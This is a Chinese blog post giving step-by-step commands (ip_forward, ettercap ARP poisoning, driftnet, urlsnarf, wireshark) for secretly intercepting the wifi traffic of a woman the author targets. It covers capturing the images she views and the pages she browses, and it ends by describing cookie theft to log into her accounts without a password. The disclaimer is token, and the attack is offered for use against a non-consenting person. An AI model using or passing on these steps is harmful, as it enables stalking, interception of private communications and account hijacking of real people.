linux内网嗅探，监控局域网内记录

无聊就玩了玩，不要干一些坏事哟~~网上也有一些文章关于kali linux的，就实战了一番。kali是用的debian 。

前提你与女神处于同一wifi下。

找到女神的ip地址，这个点她手机里面的wlan就可以看到。那么也可以用ip scanner扫描出来。

ip scanner

 

kali虚拟机下连接外置的usb无线网卡，虚拟机不支持内置无线网卡，但可以桥接内置的无线网卡。这里我用的是外置usb无线网卡。

 

终端输入 echo 1 > /proc/sys/net/ipv4/ip_forward 进行ip转发，保证女神的正常上网

 

终端输入 zenmap

 

再打开一个终端，输入ettercap -G

 

 

选择网卡wlan0

点击 hosts-->scan扫描主机，点击hosts list 获取主机列表

 

女神的IP设置为目标1，路由器的IP设置为目标2

 

设置中间人，插入第3者！

接着嗅探，确定

 

开始嗅探

 

再打开一个终端，输入driftnet -i wlan0  等待获取图片

语法 ： driftnet   [options]   [filter code]

主要参数：

-b               捕获到新的图片时发出嘟嘟声

-i  interface     选择监听接口

-f  file   读取一个指定pcap数据包中的图片

-p  不让所监听的接口使用混杂模式

-a  后台模式：将捕获的图片保存到目录中（不会显示在屏幕上）

-m number 指定保存图片数的数目

-d directory  指定保存图片的路径

-x prefix  指定保存图片的前缀名

使用举例：

1.实时监听： driftnet -i wlan0

2.读取一个指定pcap数据包中的图片： driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/

再打开一个终端，输入urlsnarf -i wlan0 监听女神浏览过的网页日志，等待获取

再打开一个终端，输入wireshark ，进行抓包

 

下面就是抓取的女神看过的图片以及浏览过的网页日志。网页可以打开。

 

 

另外，ettercap也可以获取cookie,导入谷歌浏览器即可免密码进入网页。